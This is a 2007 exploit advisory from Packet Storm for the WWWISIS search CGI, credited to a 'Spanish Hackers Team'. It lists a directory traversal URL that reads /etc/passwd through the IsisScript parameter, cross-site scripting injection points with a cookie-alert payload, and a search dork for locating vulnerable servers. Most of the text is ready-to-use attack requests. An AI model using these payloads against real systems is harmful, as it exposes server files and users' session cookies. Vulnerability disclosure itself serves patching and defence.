wwwisis-xssfile.txt

🗓️ 15 Oct 2007 00:00:00Reported by JosSType

packetstorm🔗 packetstormsecurity.com👁 29 Views

There are multiple vulnerabilities in WWWISIS search, including local file disclosure and XSS exploits

`# WWWISIS (Search) Multiple Vulnerabilities  
# Download:  
# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2  
# Bug found by JosS  
# Contact: sys-project[at]hotmail.com  
# Spanish Hackers Team  
# www.spanish-hackers.com  
# d0rk: powered by WWWISIS  
#Stop lammer  
  
  
# Local File Disclosure Vulnerability:  
  
http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]  
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd  
  
  
# Exploit In (XSS):  
  
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i  
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e  
....  
  
[ i,e ... ] it is the language of script  
  
# Cross Siting Scripting:  
  
<script>alert(document.cookie)</script>  
  
  
//---------------------------------------\\  
  
Greetz To: All Hackers  
JosS!  
`

15 Oct 2007 00:00Current

7.4High risk

Vulners AI Score7.4